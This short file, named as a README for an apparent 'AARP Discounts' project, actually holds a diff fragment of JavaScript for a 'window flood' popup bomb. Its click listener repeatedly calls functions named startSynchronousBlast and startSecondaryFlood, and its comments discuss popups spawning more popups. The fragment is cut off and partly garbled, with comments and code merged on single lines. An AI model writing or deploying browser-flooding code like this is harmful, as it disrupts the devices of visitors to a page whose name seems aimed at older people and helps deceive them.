hshbs508-beep/AARP-Discounts/README.md

         // --- Window Flood Repeat Function ---
         function repeatWindowFlood() {
+            // This function is now the dedicated, permanent click listener
+            // Check if the current window is the main starter window (hash !== '#start')
-            // Only the main window should repeat the flood, not the popups if (window.location.hash !== '#start') {
+            // This prevents a popup from spawning more popups (a true recursive bomb) if (window.location.hash !== '#start') {
                 startSynchronousBlast();
                 startSecondaryFlood();